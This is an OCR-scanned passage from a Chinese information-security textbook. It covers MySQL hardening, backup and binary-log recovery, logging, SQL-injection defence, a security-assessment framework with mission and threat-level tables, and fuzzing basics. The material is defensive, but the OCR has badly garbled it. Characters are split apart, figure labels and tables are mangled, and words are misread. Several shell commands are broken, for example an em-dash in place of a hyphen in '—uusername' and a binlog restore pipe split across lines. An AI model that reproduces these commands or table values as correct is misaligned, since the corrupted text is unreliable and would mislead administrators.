%mysql> REVOKE priviledges ON databasename.tablename FROM ‘username’ @'host'; 
7.3.3.2 MySQL 数据 库 所 在 主机 安全 配置 
(1) MySQL 进程 运行 账号 
主机 不 能 由 最 高 权限 的 用 户 来 运行 MySQL， 需 建 一 个 专门 运行 MySQL 的 用 户 。 
(2) 目录 权限 限制 
给 予 运 行 账号 MySQL 程序 所 在 目录 的 读 取 权限 和 数据 库 文件 所 在 目录 的 读 取 和 写 
入 权限 ， 禁 止 给 予 其 他 目录 的 写 入 和 执行 权限 。 应 限定 未 经 授权 用 户 对 数据 库 文件 的 随 
(3) 关闭 MySQL 对 本 地 文件 的 读 取 
MySQL 使 用 load data local infile 命令 , 可 对 本 地 文件 进行 读 取 。 若 被 攻击 者 所 利用 ， 
非常 危险 。 设 定 配置 文件 里 的 变量 local-infile=0， 可 关闭 MySQL 对 本 地 文件 的 读 取 。 
(4) 历史 记录 清除 
数据 库 操作 命令 、 登 录 数 据 库 后 的 操作 会 被 记录 在 文件 里 ， 若 这 些 文件 被 读 取 ， 会 
导致 数据 库 密码 和 数据 库 结构 等 信息 泄露 ， 建 议 将 记录 文件 置 空 。 
7.3.3.3 MySQL 网 络 访问 安全 配置 
C1) 限制 访问 MySQL 的 IP 
可 通过 Windows 防火 墙 、Linux iptables 来 设 定 允许 访问 MySQL 端口 的 人 地址, 也 
可 为 MySQL 用 户 指定 访问 地 址 。 
(2) 修改 MySQL 的 端口 
通过 设 定 配置 文件 (在 Windows 上 为 myini， 在 Linux 上 为 my.cnf) 里 的 port 变量 
(3) 限制 连接 用 户 数 量 
通过 设 定 配置 文件 mysqld 选项 中 的 max_user_connections 变量 来 完成 。 
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7334 数据库 备 份 与 恢复 

使 用 mysqldump 命令 ， 可 把 整个 数据 库 备 份 到 一 个 单独 的 文件 中 。 为 保证 数据 的 一 
致 性 ， 在 进行 备份 前 ， 先 执行 如 下 SQL 语句 ， 把 内 存 中 的 数据 都 刷新 到 磁盘 中 ， 锁 定数 
据 表 ， 保 证 备份 过 程 中 不 会 有 新 的 数据 写 入 。 

%mysql> FLUSH TABLES WITH READ LOCK; 

使 用 mysqldump 命令 的 格式 如 下 : 

% mysqldump -uusername -puserpassword databasebanme > backupfile 

恢复 数据 使 用 命令 : 

% mysql -hhostname —uusername -puserpassword databasename < backupfile 
7.3.3.5 MySQL 日 志 

启动 MySQL 日 志 ， 有 助 于 加 固 MySQL 数据 库 的 安全 ， 如 从 日 志 中 获得 典型 SQL 
注入 语句 、 泄 漏 范围 等 。MySQL 主要 有 以 下 几 种 日 志 ， 可 在 配置 文件 中 设 定 变量 以 定 
义 相 应 的 日 志文 件 : 

O 错误 日 志 ，log-err 

© 查询 日 志 (记录 SELECT 语句 )，log 

© 慢 查 询 日 志 ，log-slow-queries 

@ 二 进 制 日 志 (记录 除 SELECT 之 外 的 所 有 SQL 语句 )，log-bin 

可 使 用 如 下 命令 查看 日 志 开 启 情况 : 

% show variables like 'log_%'; 

假设 配置 信息 log-bin 所 设 定 的 二 进 制 日 志文 件 名 称 为 “mysql log bin”, MySQL 
创建 二 进 制 日 志文 件 时 ， 首 先 创建 一 个 “mysql log bin.index ”文件 ， 再 创建 一 个 
“ mysql log bin.000001 ”文件 。MySQL 服务 每 重新 启动 一 次 ， 会 增加 一 个 
“ mysql log_bin.xxxxxx” 文 件 ， 数 字 “xxxxxx” 加 1 递增 ; 如 果 日 志 长 度 超过 了 
max_binlog size 上 限 (默认 是 1G)， 也 会 创建 一 个 新 的 日 志文 件 。 

使 用 如 下 命令 查看 日 志文 件 : 

% show master logs; 

使 用 如 下 命令 查看 二 进 制 日 志 : 

% mysqlbinlog mysql_log_bin.xxxxxx; 

使 用 如 下 命令 从 二 进 制 日 志文 件 中 恢复 数据 : 


“ 


» 


% mysqlbinlog mysql_log_bin.xxxxxx --start-position=startnumber 


—stop-position=stopnumber|databasename —uusername —puserpassword 
7.3.3.6 ”部 署 SQL 注入 检测 、 防 御 模 块 

针对 SQL 注入 攻击 ， 可 部 署 : 

© 数据 库 防火 墙 系统 。 

@ 入 侵 检测 系统 ， 对 指定 端口 进行 正则 特征 匹配 的 SQL 注入 检测 。 
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© Javal DEE 过 滤器 ， 针 对 J2EE WEB 应 用 ， 在 HTTP 请 求 上 部 署 过 滤器 ,将 SQL 
注入 检测 规则 写 在 过 滤器 中 。 
D SQL 检测 、 阻 断 系 统 。 
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信息 安全 测评 是 信息 系统 安全 保障 的 基础 。 通 过 信息 安全 评估 ， 能 够 确定 信息 系统 
的 安全 现状 和 安全 需求 ， 并 在 此 基础 上 对 信息 安全 保障 体系 建设 进行 有 序 的 规划 ， 提 高 
信息 系统 的 安全 现状 和 安全 需求 。 


7.4.1 信息 系统 安全 测评 概述 


1. 信息 系统 安全 测评 内 洒 

信息 系统 安全 是 指 对 信息 系统 及 其 处 理 的 信息 采取 适当 的 安全 保障 措施 ， 防 止 未 授 
权 的 访问 、 使 用 、 泄 露 、 中 断 、 修 改 、 破 坏 ， 从 而 确保 信息 系统 及 其 信息 的 机 密 性 、 完 
整 性 和 可 用 性 ， 保 证 信息 系统 功能 的 正确 实现 。 

信息 系统 安全 测评 是 依据 信息 安全 测评 的 要 求 ， 在 风险 评估 的 基础 上 ， 对 在 信息 系 
统 生 命 周 期 中 采取 的 技术 类 、 管理 类 、 过 程 类 和 人 员 类 的 安全 保证 措施 进行 测评 和 检查 ， 
确定 信息 系统 安全 保证 措施 对 履行 其 职能 的 有 效 性 及 其 面临 安全 风险 的 可 承受 度 。 

信息 系统 安全 测评 依据 的 概念 模型 是 一 种 合理 的 和 自我 包容 的 整体 安全 保障 模型 。 

包含 保证 对 象 、 生 命 周期 和 信息 特征 三 方面 的 模型 。 

本 模型 主要 特点 为 : 

(1) 以 安全 概念 和 关系 为 基础 , 将 风险 和 策略 作为 信息 系统 安全 保障 的 基础 和 核心 ; 

(2) 强调 信息 系统 安全 保障 持续 发 展 的 动态 安全 模型 ， 即 强调 信息 系统 安全 保障 应 
渗入 整个 信息 系统 生命 周期 的 全 过 程 ; 

(3) 强调 信息 系统 安全 保障 的 概念 ， 信 息 系统 的 安全 保障 是 通过 综合 技术 、 管 理 、 
过 程 和 人 员 的 要 求 等 措施 实施 和 实现 信息 系统 的 安全 目标 ， 通 过 对 信息 系统 的 技术 、 管 
理 、 过 程 和 人 员 要 求 的 评估 结果 以 及 相应 的 认证 认可 , 提供 对 信息 系统 安全 保障 的 信心 ; 

(4) 通过 风险 和 策略 基础 ， 生 命 周期 和 保障 层面 ， 实 现 信息 的 可 用 性 和 完整 性 ， 从 
而 达到 保障 组 织 机 构 执行 其 使 命 的 根本 目的 。 

2. 信息 系统 安全 测评 意义 

在 我 国 实施 并 开展 国家 信息 系统 安全 测评 ， 是 落实 “积极 防御 ， 综 合 防范 ”方针 ， 
确保 我 国信 息 化 安全 、 可 控 建设 的 重要 环节 与 保障 手段 ， 国 家 信息 系统 安全 认可 是 政府 
主管 部 门 依据 信息 安全 测评 的 结果 ， 对 信息 系统 安全 建设 做 出 的 管理 决策 ， 目 的 是 在 接 
受信 息 安全 风险 的 前 提 下 ， 批 准 信息 系统 的 建设 和 运行 。 

国家 信息 安全 测评 的 重要 性 有 以 下 几 个 方面 
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(1) 深化 理解 信息 系统 运行 中 产生 的 安全 风险 可 接受 程度 ; 

(2) 为 信息 系统 建设 的 安全 审批 和 认可 决策 者 提供 更 完整 、 更 可 靠 、 更 可 信 的 建议 ; 

(3) 推动 国家 电子 政务 信息 系统 的 安全 建设 更 加 规范 化 、 标 准 化 ; 

C4) 促使 对 国家 基础 设施 等 信息 系统 的 安全 保证 措施 的 测评 工作 更 具 一 致 性 、 可 比 
性 和 可 重复 性 。 


7.4.2 ”信息 系统 安全 测评 的 基础 与 原则 


1. 信息 系统 安全 测评 

信息 系统 是 由 信息 技术 系统 以 及 包含 了 人 、 管 理 、 环 境 的 运行 环境 组 成 ， 信 息 系统 
安全 保障 是 对 信息 系统 整个 生命 周期 中 抵御 风险 能 力 的 综合 考虑 。 因 此 ， 信 息 系 统 保障 
工作 需要 建立 基于 能 力 的 逐步 改进 的 长 效 机 制 。 基 于 能 力 的 信息 安全 测评 以 及 在 相关 的 
软件 能 力 成 熟 度 模型 、 信 息 治 理 Cobit 模型 、 信 息 服 务 和 支持 ITIL 框架 等 ， 都 已 经 成 为 
了 国内 外 专家 所 普遍 认可 的 方式 。 

信息 系统 安全 保障 能 力 及 能 力 评估 包括 对 安全 技术 架构 能 力 、 安 全 管理 能 力 、 安 全 
工程 建设 能 力 的 能 力 综合 ,信息 系统 安全 保障 能 力 的 评估 需要 对 这 些 能 力 进行 综合 评定 。 

对 信息 系统 安全 测评 必须 考虑 信息 系统 的 特定 运行 环境 和 保障 需求 ， 并 提供 信息 系 
统 安全 保障 能 力 的 评估 ;也 就 是 说 信息 系统 安全 保障 的 结果 应 提供 信息 系统 安全 保障 工 
作 满足 用 户 信 息 系 统 在 其 运行 环境 下 的 安全 保障 需求 并 且 对 完成 安全 保障 需求 的 能 力 ， 
即 信息 系统 安全 保障 能 力 进 行 评估 。 这 样 构 成 了 信息 系统 安全 测评 的 全 部 内 容 。 

对 信息 系统 的 安全 保障 的 评估 ， 首 先 需 要 根据 信息 系统 运行 环境 及 相关 的 信息 系统 
安全 保障 需求 进行 描述 ,信息 系统 安全 测评 准则 提供 了 对 安全 保障 需求 描述 的 公共 语言 、 
结构 和 方法 , 这 就 是 信息 系统 安全 保障 要 求 (ISPP); 然后 就 可 以 依据 信息 安全 保障 要 求 
(ISPP) 编制 满足 用 户 需 求 的 信息 系统 安全 保障 方案 , 即 信息 系统 安全 保障 目标 ASST). 
系统 评估 者 依据 这 些 文件 对 信息 系统 安全 保障 方案 ASST) 对 信息 系统 安全 保障 要 求 
(ISPP) 的 符合 情况 进行 评估 , 并 在 整个 信息 系统 生命 周期 中 对 信息 系统 安全 保障 方案 的 
执行 情况 和 执行 能 力 进 行 评估 ;最 终 确定 组 织 机 构 的 信息 系统 安全 保障 能 力 的 级 别 。 

(1) 信息 系统 安全 保障 等 级 评估 总 体 框架 

如 图 7-39 所 示 ， 在 基于 安全 风险 分 析 得 出 的 信息 系统 安全 保护 等 级 划分 的 基础 上 ， 
提出 安全 需求 ， 即 得 到 评估 对 象 的 保护 轮廓 。 参 照 评 估 准 则 和 规范 ， 制 定 出 评估 预案 和 
规划 ， 使 用 相应 评估 方法 和 工具 ， 即 可 实施 对 评估 对 象 的 评估 操作 。 评估 中 发 现 的 问题 、 
差距 再 反馈 到 评估 的 预案 制订 和 安全 需求 ， 评 估 对 象 作 相应 调整 、 优 化 ， 达 到 信息 系统 
资产 所 有 者 保证 资产 安全 的 初衷 ， 即 残余 风险 是 可 以 承受 的 ， 资 产 价值 受到 保护 ， 使 命 
可 以 完成 ， 最 后 得 到 评估 结论 ， 并 给 出 安全 等 级 的 认证 。 
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图 7-39 信息 系统 安全 保障 等 级 评估 总 体 框架 


(2) 信息 系统 安全 保障 等 级 评估 规范 的 建立 

为 了 提炼 出 评估 对 象 的 安全 需求 ， 如 图 7-40 所 示 ， 需 要 建立 安全 环境 ， 综 合 考虑 如 
PAR: 需要 保护 的 信息 系统 资产 ， 系统 所 要 完成 的 使 命 、 组 织 管理 、 所 处 的 物理 环境 ， 
其 面临 的 威胁 、 信 息 对 抗 的 假设 ， 然 后 在 该 特定 的 安全 环境 下 确立 系统 的 安全 目标 ， 提 
出 系统 的 安全 需求 : 包括 安全 技术 需求 、 安 全 管理 需求 、 安 全 过 程 需求 和 系统 服务 安全 
的 需求 ， 最 终 形 成 系统 安全 保障 等 级 评估 的 规范 。 


系统 使 命 


威胁 
安全 目标 


评估 规范 


图 7-40 信息 系统 安全 保障 等 级 评估 规范 
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(3) 信息 系统 生命 周期 中 安全 保障 和 评估 

信息 系统 安全 保障 和 评估 的 安全 需求 通常 是 主要 检测 其 期 望 的 行为 ， 但 并 不 总 是 能 
证 明 不 存在 不 期 望 的 行为 。 信 息 系 统 的 安全 评估 对 那些 显 形 的 安全 容易 察觉 ， 而 对 那 隐 
形 的 安全 较 难 察觉 。 信 息 系 统 的 安全 评估 系统 靠 成 型 后 的 最 终 评估 是 非常 重要 的 ， 但 在 
系统 生命 周期 全 过 程 的 安全 保障 和 评估 中 也 是 必要 的 ， 这 就 需要 对 信息 系统 进行 全 生命 
周期 的 安全 评估 。 

如 图 7-41 所 示 ， 系 统 生命 周期 内 的 安全 保障 和 评估 应 该 贯穿 下 列 各 阶段 : 

DO 策划 与 组 织 阶段 确定 系统 使 命 、 系 统 安全 目标 ; 

© 开发 与 设计 阶段 确定 系统 结构 、 威 胁 分 析 、 脆 弱 性 分 析 、 风 险 分 析 、 安 全 要 求 、 
安全 策略 ; 

© 采购 与 实施 阶段 物理 环境 安全 、 系 统 安全 实施 、 采 购 安全 控制 、 网 络 安全 、 应 
用 安全 、 数 据 安全 、 管 理 安全 ; 

© 交付 与 运行 系统 运转 的 可 用 性 、 系 统 安全 评估 的 可 信和 性; 

O 维护 、 更 新 或 废弃 维护 安全 、 升 级 安全 、 废 弃 安全 残余 信息 保护 )。 


策划 与 组 织 开发 与 采购 实施 与 交付 运行 与 维护 更 新 与 废弃 


信息 系统 安全 保障 与 评估 


图 7-41 系统 生命 周期 内 的 安全 保障 和 评估 


综 上 所 述 ， 信 息 系统 安全 评估 规范 将 具有 以 下 特点 : 

D 以 信息 系统 面临 的 安全 风险 为 出 发 点 ， 以 安全 策略 为 核心 ; 

@ 强调 信息 系统 安全 保障 是 一 个 动态 的 持续 发 展 过 程 ， 即 信息 系统 安全 应 贯穿 信 
息 系统 全 生命 周期 ; 

@ 强调 信息 系统 安全 的 要 求 和 保证 概念 ， 信 息 系统 的 安全 是 通过 综合 技术 、 管 理 、 
过 程 和 人 员 的 要 求 等 措施 实施 和 实现 信息 系统 的 安全 目标 ， 通 过 对 信息 系统 的 技术 、 管 
理 `. 过 程 和 人 员 等 方面 的 安全 评估 结果 及 安全 认证 来 提供 对 信息 系统 安全 的 保证 和 信心 ; 

@ 通过 风险 和 策略 基础 以 及 生命 周期 和 保证 层面 ， 从 而 使 信息 系统 安全 实现 信息 
技术 安全 根本 原则 ， 保 障 组 织 机 构 执 行 其 使 命 的 根本 目标 。 

2. 信息 系统 安全 测评 的 基本 原则 

(1) 标准 性 原则 

信息 系统 的 安全 风险 评估 ， 应 按照 GB/T 20984—2007 中 规定 的 评估 流程 进行 实施 ， 


第 7 章 信息 系统 安全 工程 


包括 各 阶段 性 的 评估 工作 。 

(2) 关键 业务 原则 

信息 安全 风险 评估 应 以 被 评估 组 织 的 关键 业务 作为 评估 工作 的 核心 ， 把 涉及 这 些 业 
务 的 相关 网 络 与 系统 ， 包 括 基础 网 络 、 业 务 网 络 、 应 用 基础 平台 、 业 务 应 用 平台 等 作为 
评估 的 重点 。 

(3) 可 控 性 原则 

© 服务 可 控 性 

评估 方 应 事先 在 评估 工作 沟通 会 议 中 向 用 户 介绍 评估 服务 流程 ， 明 确 需 要 得 到 被 评 
估 组 织 协作 的 工作 内 容 ， 确 保安 全 评估 服务 工作 的 顺利 进行 。 

© 人 员 与 信息 可 控 性 

所 有 参与 评估 的 人 员 应 签署 保密 协议 ， 以 保证 项 目 信息 的 安全 ; 应 对 工作 过 程 数据 
和 结果 数据 严格 管理 ， 未 经 授权 不 得 泄露 给 任何 单位 和 个 人 。 

@ 过 程 可 控 性 

应 按照 项 目 管理 要 求 , 成 立项 目 实施 团队 , 项 目 组 长 负责 制 , 达到 项 目 过 程 的 可 控 。 

@ 工具 可 控 性 

安全 评估 人 员 所 使 用 的 评估 工具 应 该 事先 通告 用 户 ， 并 在 项 目 实施 前 获得 用 户 的 许 
可 ， 包 括 产品 本 身 、 测 试 策略 等 。 

3. 信息 系统 的 分 级 原则 

当今 相互 连接 和 互相 依赖 的 信息 环境 中 包含 了 多 种 平台 与 技术 ， 信 息 系统 很 可 能 会 
面临 各 种 威胁 (包括 有 意 威胁 和 无 意 威 胁 ), 这 些 威胁 和 系统 脆弱 性 会 对 系统 产生 诸如 核 
心 信息 失 密 、 主 要 资产 遭 到 破坏 乃至 整个 信息 系统 瘫痪 等 类 型 的 安全 影响 ， 因 此 ， 对 信 
息 系统 面临 的 安全 风险 需要 划分 适当 的 安全 级 别 ， 在 此 基础 上 ， 对 我 国 所 有 的 信息 系统 
进行 合理 分 类 ， 并 采取 与 之 相 适 应 的 安全 保证 措施 ， 从 而 保障 国家 的 信息 安全 保障 体系 
的 建设 。 

信息 系统 安全 保障 的 分 级 ， 需 要 先 根据 信息 系统 所 处 理 信息 的 机 密 性 、 完 整 性 和 可 
用 性 特征 以 及 信息 和 信息 系统 价值 划分 定义 其 使 命 类 ， 然 后 考虑 信息 安全 保障 所 要 处 理 
的 威胁 级 别 ， 最 后 再 根据 使 命 类 和 威胁 级 别 的 矩阵 确定 相对 应 的 信息 系统 安全 保障 级 
ASAL) 要 求 。 

由 于 各 信息 系统 的 安全 保障 要 求 和 信息 系统 的 使 命 不 同 ， 信 息 系统 安全 保障 级 
ASAL) 需要 根据 相关 国家 、 政 府 部 门 、 行 业 等 的 法 律 、 法 规 、 规 范 、 要 求 来 具体 制定 ， 
并 最 终 反 映 在 相关 的 信息 系统 安全 测评 准则 之 中 ， 因 此 此 处 所 列 出 的 信息 系统 安全 保障 
级 ASAL) 仅 作为 原理 性 参考 说 明 。 

(1) 信息 系统 使 命 分 类 

根据 机 密 性 、 完 整 性 和 可 用 性 特征 以 及 信息 和 信息 系统 价值 ， 将 信息 系统 划分 为 如 
表 7-4。 


Go: 


图 ?784 攻 信息 安全 工程 师 教 各 


RIA 信息 系统 使 命 分 类 


信息 系统 a 
res 信息 和 信息 系统 价值 
| 对 信息 安全 保障 策略 的 违犯 造成 的 负 
面 影响 和 结果 可 以 忽略 
对 信息 安全 保障 策略 的 违犯 会 对 安全 、 
1 保险 、 爹 融 状况 、 组 织 机 构 的 基础 设施 
造成 不 良 影响 和 /或 小 的 破坏 
a 对 信息 安全 保障 策略 的 违犯 会 产生 一 
定 破 坏 
对 信息 安全 保障 策略 的 违犯 会 严重 的 
IV 破坏 安全 、 保 险 、 金 融 状 况 、 组 织 机 构 
的 基础 设施 
对 信息 安全 保障 策略 的 违犯 会 造成 异 
常 严重 的 破坏 


(2) 信息 系统 威胁 分 级 
一 般 将 信息 系统 的 威胁 分 为 7 级， 如 表 7-5 所 示 。 


表 7-5 信息 系统 威胁 分 级 


威胁 级 别 威胁 说 明 
Ti 无 意 的 或 意外 的 事件 
T2 被 动 的 、 无 意识 的 占有 很 少 资源 并 且 愿 意 冒 少量 风险 的 对 手 
T3 占有 少量 资源 但 是 愿意 冒 很 大 风险 的 对 手 
T4 占有 中 等 程度 资源 的 熟练 的 对 手 ， 愿 意 冒 少量 风险 
TS 占有 中 等 程度 资源 的 特别 熟练 的 对 手 ， 愿 意 冒 较 大 风险 
T6 点 有 丰富 程度 资源 的 特别 熟练 的 对 手 ， 愿 意 冒 少量 风险 
T7 点 有 丰富 程度 资源 的 特别 熟练 的 对 手 ， 愿 意 冒 较 大 风险 


(3) 信息 系统 安全 保障 级 OSAL) HE 

得 到 了 信息 系统 的 使 命 类 和 信息 系统 的 威胁 分 级 ， 就 可 以 利用 表 7-6 对 信息 系统 的 
安全 保障 级 作出 要 求 。 信 息 系统 安全 保障 级 是 信息 系统 技术 、 管 理 、 工 程 的 分 类 分 级 的 
综合 评定 。 信 息 系统 安全 保障 级 需要 根据 相关 国家 、 政 府 部 门 、 行 业 等 的 法 律 、 法 规 、 
规范 和 要 求 来 具体 制定 并 最 终 反 映 在 信息 系统 安全 保障 评估 框架 之 中 。 信 息 系统 安全 保 
障 级 是 一 个 循序 渐进 、 不 断 完 美和 深入 的 过 程 ， 高 等 级 安全 保障 级 必须 建立 在 完成 低 安 
全 保障 级 别 完成 的 基础 上 。 高 等 级 的 安全 保障 级 是 低 等 级 保障 级 的 基础 上 不 断 能 力 成 熟 、 
完善 和 发 展 的 结果 。 
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7.4.3 ”信息 系统 安全 测评 方法 


7.4.3.1 ”模糊 测试 

模糊 测试 (Fuzzing) 是 一 种 黑 盒 测试 技术 , 它 将 大 量 的 畸形 数据 输入 到 目标 程序 中 ， 
通过 监测 程序 的 异常 来 发 现 被 测 程序 中 可 能 存在 的 安全 漏洞 。 模 糊 测试 的 思想 相对 较 简 
单 直观 ， 易 于 实现 自动 化 ， 并 且 运 用 其 发 掘 软件 安全 漏洞 ， 从 漏洞 发 现 到 重 现 和 定位 漏 
洞 比较 容易 ， 不 存在 漏洞 误 报 ， 目 前 正 广泛 应 用 于 对 文件 格式 、 网 络 协议 、Web 程序 、 
环境 变量 和 COM 对 象 等 的 安全 测试 中 。 已 有 的 大 量 实践 结果 都 表明 ， 模 糊 测 试 技术 是 
一 种 发 掘 安全 漏洞 的 有 效 方法 。 

表 7-6 信息 系统 安全 保障 级 


使 命 类 威胁 级 别 
Ti T6 
I ISAL1 ISAL2 
I ISAL1 ISAL3 
II ISAL1 ISAL4 
IV ISAL2 ISALS 
V ISAL3 ISALS 


模糊 测试 概念 的 提出 可 以 追溯 到 1989 年 , 当时 威斯康星 大 学 的 Barton Miller 教授 
在 他 的 高 级 操作 系统 课 中 开发 和 使 用 了 一 个 原始 的 模糊 测试 工具 ， 用 来 测试 UNIX 应 
用 程序 的 健壮 性 (Miller et al，1990)。 测 试 的 重点 并 不 是 评价 系统 的 安全 性 ， 而 是 验证 
程序 全 部 代码 的 质量 和 可 靠 性 。Miller 小 组 所 采用 的 模糊 测试 方法 是 一 种 纯 黑 盒 的 完全 
暴力 方式 ， 即 简单 地 向 目标 应 用 程序 输入 随机 字符 串 ， 同 时 监测 目标 程序 的 运行 ， 如 果 
目标 程序 发 生 异 常 或 月 站 ， 则 认为 测试 失败 ， 否 则 就 认为 通过 测试 。 

1. 模糊 测试 原理 

模糊 测试 是 一 种 基于 缺陷 注入 的 自动 化 测试 技术 ， 没 有 有 具体 的 执行 规则 ， 虽 在 预测 
软件 中 可 能 存在 的 错误 以 及 什么 样 的 输入 能 够 触发 错误 。 其 通过 模糊 器 向 目标 应 用 发 送 
大 量 的 畸形 数据 并 监视 程序 运行 异常 以 发 现 软件 故障 ， 通 过 记录 触发 异常 的 输入 数据 来 
进一步 定位 异常 位 置 。 

与 基于 源 代码 的 白 盒 测 试 相 比 ， 模 糊 测试 的 测试 对 象 是 二 进 制 目标 文件 ， 因 而 具有 
更 好 的 适用 性 ， 模 糊 测试 是 一 种 自动 化 的 动态 漏洞 挖掘 技术 ， 不 存在 误 报 ， 也 不 需要 人 
工 进行 大 量 的 逆向 分 析 工 作 。 

完整 的 模糊 测试 都 要 经 历 以 下 几 个 基本 的 阶段 ， 如 图 7-42 所 示 。 


Bos 加 


HF 


息 安 全 工程 师 教程 


Xt 


al 


确定 可 利用 性 


图 7-42 一 般 模糊 测试 执行 流程 


(1) 识别 目标 


在 没有 确定 测试 对 象 测试 范围 的 情况 下 ， 无 法 对 模糊 测试 工具 或 技术 作出 选择 。 通 
常 我 们 需要 考虑 以 下 问题 : 被 测 目标 类 型 ， 如 被 测 目标 是 客户 端 程序 还 是 服务 端 程序 ， 
是 应 用 层 协议 还 是 网 络 层 协 议 ， 被 测 目标 历史 上 是 否 出 现 过 漏洞 ， 漏 洞 原因 在 哪里 等 。 


(2) 识别 输入 


几乎 所 有 可 被 人 利用 的 漏洞 都 是 因为 应 用 程序 接受 了 用 户 的 输入 并 且 在 处 理 输入 
数据 时 没有 首先 清除 非法 数据 或 执行 确认 例 程 。 枚 举 输入 向 量 对 模糊 测试 的 成 功 至 关 重 
要 。 未 能 定位 可 能 的 输入 源 或 预期 的 输入 值 对 模糊 测试 将 产生 严重 的 限制 。 任 何 从 客户 
端 发 往 目 标 应 用 程序 的 输入 都 应 该 被 认为 是 输入 向 量 。 这 些 输入 包括 消息 头 、 文 件 名 、 
环境 变量 、 注 册 键 值 等 等 。 所 有 这 些 都 应 该 被 认为 是 输入 向 量 ， 因 此 都 应 该 是 可 能 的 模 
糊 测试 变量 。 


G) 生成 模糊 测试 数据 


一 旦 识别 出 输入 向 量 ， 就 可 以 生成 模糊 测试 数据 。 可 依据 测试 对 象 的 特征 ， 制 定 相 
应 的 模糊 测试 数据 生成 策略 。 例 如 可 通过 变异 已 有 的 数据 动态 生成 数据 。 不 管 选 择 什么 
策略 ， 生 成 模糊 测试 数据 过 程 中 都 应 该 引入 自动 化 。 


(4) 执行 模糊 测试 数据 


第 7 章 信息 系统 安全 工程 


执行 过 程 可 能 包括 发 送 数据 包 给 目标 应 用 程序 、 打 开 一 个 文件 或 发 起 一 个 目标 进 
程 。 同 样 ， 这 个 过 程 中 的 自动 化 也 是 至 关 重 要 的 。 没 有 自动 化 ， 便 无 法 执行 真正 的 模糊 
测试 。 

(5) 监视 异常 

在 模糊 测试 过 程 中 ， 对 故障 或 异常 的 监视 过 程 有 重要 意义 。 例 如 ， 如 果 我 们 没有 办 
法 准确 指出 是 哪 一 个 数据 包 引 起 崩溃 , 那么 向 目标 Web 服务 器 发 送 10000 个 模糊 测试 数 
据 包 ， 最 终 导致 服务 器 崩溃 便 失 去 意义 。 监 视 可 以 采用 多 种 形式 ， 同 时 不 应 该 依赖 目标 
应 用 程序 和 所 选择 的 模糊 测试 类 型 。 

(6) 确定 可 利用 性 

一 旦 确定 被 测 目 标 存在 故障 , 则 需要 确定 所 发 现 的 Bug 是 否 可 重 现 , 重 现 故障 最 常 
用 的 手段 就 是 重 放 检测 ， 即 调用 数据 包 重 放 工具 将 转 储 的 网 络 数据 包 进 行 重 放 。 重 现成 
功 后 ， 还 需 进 一 步 判 断 该 Bug 是 否 可 被 利用 。 这 是 一 个 典型 的 人 工 过 程 ， 需 要 具备 安全 
领域 的 专业 知识 。 

2. 模糊 器 类 型 

模糊 器 用 于 生成 畸形 测试 用 例 集 ， 是 整个 模糊 测试 中 非常 关键 的 部 分 。 依 据 模糊 测 
试 实施 过 程 中 使 用 的 不 同 测试 用 例 生 成 规则 ， 我 们 将 模糊 器 划分 为 随机 模糊 器 、 基 于 变 
异 的 模糊 器 和 基于 生成 技术 的 模糊 器 。 

(1) 随机 模型 器 

这 类 模糊 器 采用 完全 随机 的 方法 生成 不 符合 待 测 程序 预期 的 测试 集合 。 该 方法 简单 
易 行 ， 可 以 在 短 时 间 内 构造 大 量 的 测试 用 例 ， 在 过 去 使 用 这 样 的 技术 发 现 了 大 量 关 键 软 
件 的 漏洞 。 同 时 该 方法 的 缺点 也 非常 明显 。 

首先 ， 生 成 的 大 量 测试 用 例 是 完全 不 符合 待 测 软件 的 输入 规格 的 ， 也 就 是 说 绝 大 前 
分 的 测试 用 例 在 输入 过 滤 模 块 屏蔽 掉 ， 无 法 接触 、 检 测 程序 的 深层 代码 ， 其 次 ， 一 旦 发 
现 待 测 程序 出 现 异 常 ， 很 难 确定 对 应 的 测试 用 例 。 逆 向 搜索 导致 程序 崩溃 的 起 因 是 一 个 
相当 繁琐 的 过 程 ， 而 完全 随机 法 的 难以 重 现 性 使 得 该 方法 在 逆向 搜索 崩溃 成 因 的 过 程 中 
表现 的 最 为 吃力 。 

(2) 基于 变异 的 模型 器 

为 了 避免 产生 大 量 的 无 效 的 测试 数据 ， 基 于 变异 的 模糊 器 使 用 样本 文件 来 得 到 畸形 
数据 集合 。 这 类 模糊 器 事先 需要 收集 大 量 的 用 户 输入 样本 ， 然 后 在 这 些 样本 的 基础 上 变 
异 。 样 本 文件 是 许多 基于 变异 技术 的 数据 的 模糊 工具 用 来 变异 测试 数据 的 基准 。 基 于 样 
本 文件 产生 的 测试 数据 可 以 大 大 提高 测试 用 例 的 有 效 性 ， 提 高 测试 的 代码 覆盖 率 ， 减 小 
测试 用 例 构造 的 复杂 度 。 

针对 测试 对 象 的 不 同 ， 搜 集 样本 文件 也 采用 不 同 的 策略 : 

。 针对 文件 格式 模糊 ， 我 们 使 用 大 量 的 该 格式 文档 作为 变异 的 基准 ; 

。 针对 网 络 协议 模糊 ， 我 们 使 用 通过 嗅 探 工具 得 到 的 数据 包 转 换 的 样本 文件 作为 初 
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始 化 测试 用 例 。 

模糊 器 一 般 是 从 一 个 有 效 的 协议 文件 ( 抓 包 获得 ) 或 数据 格式 文件 样本 开始 ， 以 位 、 
字 节 、 双 字 节 、 四 字 节 、 八 字 节 、 字 符 串 为 单位 依次 或 随机 打 乱 样本 文件 并 生成 测试 数 
据 。 这 样 得 到 的 测试 数据 集 被 称 为 基于 变异 的 模糊 测试 用 例 集合 。 由 于 事先 不 需要 对 待 
测 软件 输入 格式 进行 研究 ， 测 试 人 员 不 需要 事先 理解 和 解释 协议 规约 和 文件 格式 ， 只 需 
收集 足够 的 样本 文件 ， 因 此 该 方法 相对 简单 直接 。 采 用 变异 技术 完成 的 模糊 器 有 
FileFuzz、notSPIKEfile 等 。 

(3) 基于 生成 技术 的 模糊 器 

基于 生成 技术 的 模糊 器 是 当前 应 用 范围 最 广 的 一 类 模糊 器 。 大约 1999 年 开始 , Oulu 
大 学 开始 进行 PROTOS 测试 集 的 开发 ， 他 们 通过 事先 分 析 协 议 规约 ， 然 后 产生 大 量 违背 
规约 或 可 能 让 被 测 程序 无 法 正确 处 理 的 报 文 ， 大 量 的 测试 用 例 集 通 过 这 种 方式 被 开发 
出 来 。 

用 这 种 方式 产生 测试 用 例 集 需要 事先 对 待 测 协议 规范 和 文件 格式 进行 大 量 研究 ， 工 
作 量 较 大 ， 但 一 旦 工作 完成 ， 就 可 以 生成 较为 有 效 的 可 重复 利用 的 测试 用 例 集 。 

不 同 于 随机 测试 ， 基 于 生成 技术 的 模糊 器 由 于 测试 用 例 集 基 本 符合 待 测 软件 的 输入 
